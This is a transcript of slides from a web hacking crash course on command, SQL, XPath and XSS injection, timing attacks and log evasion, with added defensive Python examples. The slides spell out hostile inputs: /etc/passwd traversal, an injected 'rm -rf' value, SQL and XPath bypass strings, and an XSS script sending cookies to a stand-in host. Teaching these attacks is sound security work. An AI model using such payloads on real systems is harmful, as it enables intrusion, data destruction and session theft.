
Crash Course in Web Hacking

Mike Gerschefske, Crash Course in Web Hacking. Summary: hacking is illegal (most of the time), so understand the laws; port scanning can be considered illegal and post 9/11 can be treated as an act of terrorism; the DMCA has exceptions for educational learning at an institution. Who cares about web hacking?





Presentation Transcript


  1. Crash Course in Web Hacking
  Mike Gerschefske

  2. Hacking is illegal (most of the time)
  • Understand the laws
  • Port scanning can be considered illegal
  • Post 9/11 it can be treated as an act of terrorism
  • DMCA exceptions
    • Educational learning (institution)

  3. Who cares about web hacking?
  • The days of buffer overflows and rooted boxes are nearing an end…
    • Non-executable stacks
    • People patching their systems
  • Everything is turning into a web system

  4. Power of Google
  • Google knows all
    • SSNs, credit card numbers, back-end SQL
    • http://johnny.ihackstuff.com/ghdb.php
    • intitle:snc-rz30 inurl:home/
  • robots.txt
    • Don't put secrets in here

  5. Power of the web browser
  • Is capable of HTTP GET/POST
  • Capable of sending any kind of GET/POST
  • Doesn't have to run client-side code (i.e. JavaScript)
  • Can send anything it wants to
  • Can be bad:
    • url: http://somesite/index.php?section=Admin
    • Vertical escalation

  6. Bad Code = Bad Security
  • You are not able to control the client end:
    • Cookies
      • Do not put the user level (admin, user, etc.) in them: vertical escalation
      • Do not put the user id in them: horizontal escalation
    • POSTs
    • GETs
    • Session IDs
    • All data
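The following is an added example, not part of the deck, illustrating the cookie point on this slide: a cookie that carries the user level or user id can be edited by the browser (vertical and horizontal escalation), while a cookie that carries only an opaque session id, or a value signed with a server-side key, cannot be usefully changed. The in-memory session store, the cookie field names and the per-process key are assumptions for the demo.

```python
import hmac
import hashlib
import secrets

# --- What the slide warns against: trusting the user level / user id stored in the cookie ---

def is_admin_naive(cookie):
    """Trusts cookie['level'] exactly as the browser sent it (vertical escalation risk)."""
    return cookie.get("level") == "admin"

# --- Hardened 1: the cookie carries only an opaque session id; level and uid stay server side ---

SESSIONS = {}  # session id -> {"uid": ..., "level": ...}  (in-memory store, a demo assumption)

def login(uid, level):
    sid = secrets.token_urlsafe(32)            # 256 bits from the OS CSPRNG: not guessable
    SESSIONS[sid] = {"uid": uid, "level": level}
    return {"sid": sid}                         # this is the whole cookie

def current_user(cookie):
    """Returns the server-side record, or None if the sid is unknown or tampered."""
    return SESSIONS.get(cookie.get("sid"))

# --- Hardened 2: if a value must live in the cookie, sign it so any edit is detected ---

SERVER_KEY = secrets.token_bytes(32)  # constructed per-process key; a real deployment keeps it in config

def sign(value):
    mac = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"

def verify(signed):
    value, _, mac = signed.rpartition(".")
    expected = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None   # constant-time compare

def demo():
    """Runs the three scenarios on constructed, browser-edited cookies."""
    results = {}
    tampered = {"level": "admin", "uid": "1"}
    results["naive_admin"] = is_admin_naive(tampered)             # True: the edit works
    cookie = login(uid=42, level="user")
    edited = dict(cookie, level="admin", uid="1")                 # extra keys are simply ignored
    results["hardened_level"] = current_user(edited)["level"]     # still "user"
    results["hardened_guess"] = current_user({"sid": "not-a-real-session-id"})  # None
    signed = sign("level=user")
    results["signed_ok"] = verify(signed)                         # "level=user"
    results["signed_tampered"] = verify(signed.replace("level=user", "level=admin"))  # None
    return results

if __name__ == "__main__":
    print(demo())
```

The signed-cookie variant still exposes the value to the user (they can read it, just not change it), so anything secret belongs in the server-side store.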

  7. Museum Example
  • Code from two years ago:

    #!/usr/bin/perl
    ...
    $first    = param('first');      # all three values come straight from the request
    $last     = param('last');
    $password = param('password');

    ...
    if (($first eq "") || ($last eq "") || (! $password eq "unbreakable")) {
        print "<p>Could not understand or wrong password!!</p>";
    }
    else {
        system "cat ./museum_ideas/${first}.${last}";   # untrusted names interpolated into a shell command
    ...

  8. Some Good Combinations
  Dump the password file:
    First Name: .
    Last Name : /../../../../etc/passwd
    Password  : unbreakable
  Delete the whole directory:
    First Name: NOTEMPTY
    Last Name : & rm -rf /home/museum/public_html/cgi_bin/museum_ideas
    Password  : unbreakable

  9. Command Injection
  • This is the basic idea of command injection
  • Security through obscurity sometimes works
  • Some people are very diligent
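As an added example (not from the deck), here is the museum script's pattern beside a hardened version of the same lookup, checked against the two inputs from slide 8. The vulnerable command is only built as a string and never executed; the hardened function allowlists the names, resolves the path, refuses anything outside the ideas directory, and reads the file from Python so no shell is involved. The temporary ideas directory, the sample file and the name policy (letters and hyphens only) are assumptions.

```python
import re
import tempfile
from pathlib import Path

# Constructed stand-in for the museum's ./museum_ideas directory, created under a temp dir
IDEAS_DIR = Path(tempfile.mkdtemp(prefix="museum_ideas_")).resolve()
(IDEAS_DIR / "Alice.Smith").write_text("build a dinosaur hall\n")

NAME_RE = re.compile(r"^[A-Za-z][A-Za-z-]{0,39}$")   # assumed name policy: letters and hyphens only
SHELL_META = set("&|;$`<>\n")

def vulnerable_command(first, last):
    """The shape of the Perl line: untrusted values interpolated into a shell command line.
    Returned as a string, never executed, so it can be inspected."""
    return f"cat ./museum_ideas/{first}.{last}"

def has_shell_metachars(s):
    """Detection helper: does a built command carry characters the shell would interpret?"""
    return any(c in SHELL_META for c in s)

def safe_read_idea(first, last):
    """Hardened lookup: allowlist the names, keep the resolved path inside IDEAS_DIR,
    and read the file directly instead of handing anything to a shell."""
    for value in (first, last):
        if not NAME_RE.fullmatch(value):
            raise ValueError(f"disallowed name: {value!r}")
    target = (IDEAS_DIR / f"{first}.{last}").resolve()
    if target.parent != IDEAS_DIR:              # defence in depth against traversal
        raise ValueError("path escapes the ideas directory")
    return target.read_text()

def check(first, last):
    """Returns ('ok', text) or ('rejected', reason) for one request."""
    try:
        return ("ok", safe_read_idea(first, last))
    except (ValueError, FileNotFoundError) as exc:
        return ("rejected", str(exc))

if __name__ == "__main__":
    print(check("Alice", "Smith"))
    print(check(".", "/../../../../etc/passwd"))
    print(check("NOTEMPTY", "& rm -rf /home/museum/public_html/cgi_bin/museum_ideas"))
```

The allowlist does most of the work; the path check is there so that a later change to the name policy (say, allowing dots) does not silently reopen traversal.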

  10. SQL Injections
  • We can send commands, why not SQL?
  • What is SQL?
  • What can we do with SQL?
    • Get any data we want (that the user has access to)
    • Delete all the data the user has access to
    • If the user is root, dump the database
    • If the user is root, can upload and execute Java/C from the database and root the box

  11. How to protect against it?
  • Check parameters
    • Not really…
  • Need to do SQL parameterization whenever at all possible
    • Mark strings as strings, ints as ints: SELECT * WHERE name = @

  12. Why doesn't checking params work?
  • If you're really smart it will, but if you don't understand the problem it won't
  • This is a very difficult problem to understand
  • Example:
    • http://viva/ictf/index.php/SQL_Injection
    • The problem is that the ' (apostrophe) is a special character
    • To fix it we just find and replace all apostrophes with two '' as that's how we insert apostrophes in a string
    • NO!

  13. Second Level SQL Injection
  • The problem actually isn't solved, just more complicated
  • Take: Username = ' OR 'a' = 'a'
    SELECT * FROM Users WHERE UserName = ''' OR ''a'' = ''a'''

  14. Goes in fine but coming out…
  • Get the username from the DB and put it in a variable
  • The variable contains SQL
  • We TRUST the DB to give us good data
  • Create another SQL query and the second one is now vulnerable
    • SELECT content FROM database WHERE username = VUNSQL (VUNSQL being the value just read back)
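Added example, not from the deck, covering slides 11 through 14 in one run: the apostrophe-doubling "fix" lets the username go in fine, the value read back is trusted and concatenated into a second query, and that second query returns every user's content; the same lookup with a bound parameter returns nothing. SQLite in memory, the two tables and their rows are constructed for the demo.

```python
import sqlite3

def escape_by_doubling(value):
    """The slide's proposed fix: replace each ' with '' before concatenating."""
    return value.replace("'", "''")

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users   (id INTEGER PRIMARY KEY, username TEXT);
    CREATE TABLE content (username TEXT, body TEXT);
    INSERT INTO content VALUES ('alice', 'alice: private note');
    INSERT INTO content VALUES ('bob',   'bob: private note');
""")

def register_with_escaping(username):
    """First level: the escaped INSERT goes in fine and stores the raw (unescaped) string."""
    sql = "INSERT INTO users (username) VALUES ('" + escape_by_doubling(username) + "')"
    return conn.execute(sql).lastrowid

def content_for_user_vulnerable(user_id):
    """Second level: the username read back from the DB is trusted and concatenated,
    so the stored string becomes part of the query:
    SELECT body FROM content WHERE username = '' OR 'a' = 'a'"""
    (username,) = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    sql = "SELECT body FROM content WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]

def content_for_user_parameterized(user_id):
    """Same logic with a bound parameter: the value is data and can never become SQL."""
    (username,) = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    rows = conn.execute("SELECT body FROM content WHERE username = ?", (username,))
    return [row[0] for row in rows]

def demo():
    """Registers the slide's username and compares the two second-level queries."""
    uid = register_with_escaping("' OR 'a' = 'a")
    stored = conn.execute("SELECT username FROM users WHERE id = ?", (uid,)).fetchone()[0]
    return {
        "stored": stored,
        "vulnerable": content_for_user_vulnerable(uid),
        "parameterized": content_for_user_parameterized(uid),
    }

if __name__ == "__main__":
    print(demo())
```

The lesson is the one the slide makes: escaping at the input boundary protects exactly one query, while parameterizing protects every query that value ever reaches, including ones built from data the application wrote itself.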

  15. XSS – Cross Site Scripting
  • Malicious injection of JavaScript
  • Cookie hijacking
  • MySpace – replicated itself, added friends
    • Samy - http://web.archive.org/web/20060208182348/namb.la/popular/tech.html

    <script>
      document.write("<img src=http://site.com/a.jpg?cookie=" + document.cookie)
    </script>
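An added example (not the deck's code) for this slide: the payload shape shown above reflected into a page unescaped beside the same page with output encoding, a Set-Cookie header with HttpOnly so document.cookie cannot read the session cookie in the first place, and a small check a log reviewer could run over query strings. The greeting template, the cookie attributes and the probe patterns are assumptions; site.com is the placeholder host from the slide.

```python
import html
from urllib.parse import unquote_plus

# The payload shape from the slide, as constructed sample input (placeholder host site.com)
SAMPLE_PAYLOAD = ('<script>document.write("<img src=http://site.com/a.jpg?cookie=" '
                  '+ document.cookie)</script>')

def render_greeting_vulnerable(display_name):
    """Reflects user-supplied text straight into the page: the script tag is live."""
    return f"<p>Hello, {display_name}</p>"

def render_greeting_escaped(display_name):
    """Output encoding: < > & \" ' become entities, so the browser renders text, not markup."""
    return f"<p>Hello, {html.escape(display_name, quote=True)}</p>"

def session_cookie_header(value):
    """HttpOnly keeps document.cookie from exposing the session cookie to any script;
    Secure and SameSite narrow where the browser sends it."""
    return f"Set-Cookie: session={value}; HttpOnly; Secure; SameSite=Lax; Path=/"

def looks_like_xss_probe(query_string):
    """Cheap log-side check: decode the query string and look for script-bearing markup.
    Crude by design (it is a triage signal, not a filter to rely on for protection)."""
    decoded = unquote_plus(query_string).lower()
    return "<script" in decoded or "javascript:" in decoded or "onerror=" in decoded

if __name__ == "__main__":
    print(render_greeting_vulnerable(SAMPLE_PAYLOAD))
    print(render_greeting_escaped(SAMPLE_PAYLOAD))
    print(session_cookie_header("constructed-session-id"))
```

Escaping on output (not on input) is the fix that survives data coming back from the database, for the same reason as the second-level SQL injection on the previous slides.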

  16. XPath Injection
  • //user[name/text() = '' or 1=1 or '' and password/text() = 'junk']
  • Used with:
    • XML-RPC
    • SOAP/WSDL

  17. IDS Will Find You
  • SQL/command injection is very easy to detect
  • IDS is poor at packet fragmentation with timing attacks

  18. Profiling
  • Need to know what you're attacking
  • Can search for exploits
  • HEAD / HTTP/1.0 example
    • Everyone's a little different
  • Nmap is a good profiler
  • Nessus will profile too

  19. Tools
  • Add N Edit Cookies – Mozilla Firefox extension
  • Wget
  • TamperData – Firefox
  • Modify Headers – Firefox
  • Curl
  • Netcat/Telnet
  • Proxies
    • Paros Proxy – free
    • Fiddler – Microsoft, free
    • Spike – free

  20. Timing Attacks
  • Breaking authentication
    • A wrong username and password may take x time while a username that doesn't exist takes y time
  • Successful timing attacks against encryption
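Added example, not from the deck, for the authentication point on this slide: a login that returns early for an unknown user does no password hashing at all, so the "x time versus y time" gap is the cost of one hash; the uniform version hashes against a dummy record for unknown users and compares with a constant-time function. Elapsed time is too noisy to assert on, so the demo counts hash computations instead. The PBKDF2 parameters, the one-user table and the dummy record are constructed.

```python
import hashlib
import hmac
import os

ITERATIONS = 10_000           # lowered for the demo; production values are much higher
HASH_CALLS = 0                # counts expensive hash computations: our stand-in for elapsed time

def pbkdf2(password, salt):
    global HASH_CALLS
    HASH_CALLS += 1
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

# constructed user table: username -> (salt, stored hash)
_salt = os.urandom(16)
USERS = {"alice": (_salt, pbkdf2("correct horse battery", _salt))}
# a dummy record so that unknown users cost the same work as known ones
_dummy_salt = os.urandom(16)
DUMMY = (_dummy_salt, pbkdf2("unused", _dummy_salt))

def login_leaky(username, password):
    """Returns at once for unknown users (no hash), and == stops at the first differing byte."""
    rec = USERS.get(username)
    if rec is None:
        return False
    salt, stored = rec
    return pbkdf2(password, salt) == stored

def login_uniform(username, password):
    """Unknown users still pay for exactly one hash; the digest compare is constant-time."""
    salt, stored = USERS.get(username, DUMMY)
    candidate = pbkdf2(password, salt)
    ok = hmac.compare_digest(candidate, stored)
    return ok and username in USERS

def hash_work(fn, username, password):
    """Returns (login result, number of hash computations) for one attempt."""
    global HASH_CALLS
    HASH_CALLS = 0
    result = fn(username, password)
    return result, HASH_CALLS

if __name__ == "__main__":
    for fn in (login_leaky, login_uniform):
        print(fn.__name__, hash_work(fn, "nobody", "x"), hash_work(fn, "alice", "x"))
```

A uniform error message ("invalid username or password") completes the picture; equal work with different messages still tells the caller which names exist.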

  21. ASP.NET Exploit
  • Debugging (source code) only available to localhost
  • Bypass this check by sending the following:
    • GET http://localhost/bleh.asp?a=j HTTP/1.0
  • It checks the server name variable rather than the remote address
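Added example (not the deck's code) of the check this slide describes and its fix: a server that honours absolute-URI request lines derives its server name from a value the client chose, so a "localhost only" test on that variable passes for a remote peer, whereas a test on the transport peer address does not. The CGI/WSGI-style environ dictionary, the request lines and the addresses are constructed; the function names are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

def server_name_from_request_line(request_line):
    """How a server that accepts absolute URIs gets its host name: from the request line,
    which the client controls. 'GET http://localhost/bleh.asp?a=j HTTP/1.0' -> 'localhost'."""
    method, target, version = request_line.split(" ", 2)
    return urlsplit(target).hostname or ""

def build_environ(request_line, remote_addr):
    """Constructed CGI/WSGI-style environ for one request."""
    return {"SERVER_NAME": server_name_from_request_line(request_line),
            "REMOTE_ADDR": remote_addr}

def debug_allowed_flawed(environ):
    """The check the slide describes: trusts the server name variable."""
    return environ.get("SERVER_NAME", "").lower() == "localhost"

def debug_allowed_fixed(environ):
    """Decide from the TCP peer address, which the client cannot choose."""
    try:
        peer = ipaddress.ip_address(environ.get("REMOTE_ADDR", ""))
    except ValueError:
        return False
    return peer.is_loopback

if __name__ == "__main__":
    remote = build_environ("GET http://localhost/bleh.asp?a=j HTTP/1.0", "203.0.113.7")
    local = build_environ("GET /bleh.asp?a=j HTTP/1.0", "127.0.0.1")
    print("remote:", debug_allowed_flawed(remote), debug_allowed_fixed(remote))
    print("local: ", debug_allowed_flawed(local), debug_allowed_fixed(local))
```

One caveat for the fixed version: behind a reverse proxy REMOTE_ADDR is the proxy, so the loopback test would then pass for everyone or no one; the decision has to be made at the first hop that sees the real peer.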

  22. mod_security
  • http://www.modsecurity.org/

  23. Replay Attacks
  • Scorebot deletes flag
  • Scorebot adds flag
  • Since the scorebot goes to everyone, we have the delete and add sequence
  • Can potentially replay the same delete sequence across all enemy servers

  24. Log Evasion
  • Many logs only log ~4K of the URL
    • Prevents DoS from filling up the logs
  • If the payload is past the 4K mark, the malicious payload won't be logged
    • http://somewhere.com/page.asp?foo=....&payload=MYPAYLOAD
    • The application ignores the foo parameter
    • The log shows up as GET /page.asp …
  • Not just IIS: Sun ONE App Server too
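Added example, not from the deck, of what a defender can do about this slide: a logger that cuts the request at the limit loses the parameter entirely, while a logger that stays within the same bound but records the full length, a truncation flag, the parameter names seen and a hash of the full URL keeps enough to notice and correlate. The 4096-byte limit, the sample request (with MYPAYLOAD as the placeholder from the slide) and the line format are constructed.

```python
import hashlib

LOG_LIMIT = 4096   # the "~4K" cutoff the slide describes; the exact value varies by server

def log_line_truncating(method, url):
    """Logger that keeps only the first LOG_LIMIT characters of the request."""
    return f"{method} {url}"[:LOG_LIMIT]

def log_line_with_evidence(method, url):
    """Still bounded, but records that truncation happened, the full length, every
    parameter name (cheap, and the one past the cutoff is the interesting one),
    and a digest of the full URL so a full-request capture can be matched later."""
    query = url.partition("?")[2]
    names = sorted({p.split("=", 1)[0] for p in query.split("&") if p})
    digest = hashlib.sha256(url.encode()).hexdigest()
    return (f"{method} {url[:LOG_LIMIT]} len={len(url)} truncated={len(url) > LOG_LIMIT} "
            f"params={','.join(names)} sha256={digest}")

def is_truncated(line):
    """Review-time check over an existing truncating log: a line that sits exactly at
    the limit is itself a signal that something was cut off."""
    return len(line) >= LOG_LIMIT

# Constructed request in the shape the slide shows: a junk parameter pads the URL past
# the cutoff so the real parameter lands beyond it (MYPAYLOAD is the slide's placeholder)
SAMPLE_URL = "/page.asp?foo=" + "x" * 4200 + "&payload=MYPAYLOAD"

if __name__ == "__main__":
    truncated = log_line_truncating("GET", SAMPLE_URL)
    print("payload visible:", "MYPAYLOAD" in truncated, "| flagged:", is_truncated(truncated))
    print(log_line_with_evidence("GET", SAMPLE_URL)[-120:])
```

Recording parameter names rather than values is a deliberate trade: it keeps the line short and avoids logging secrets, yet a parameter the application never defined (payload here) stands out immediately.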
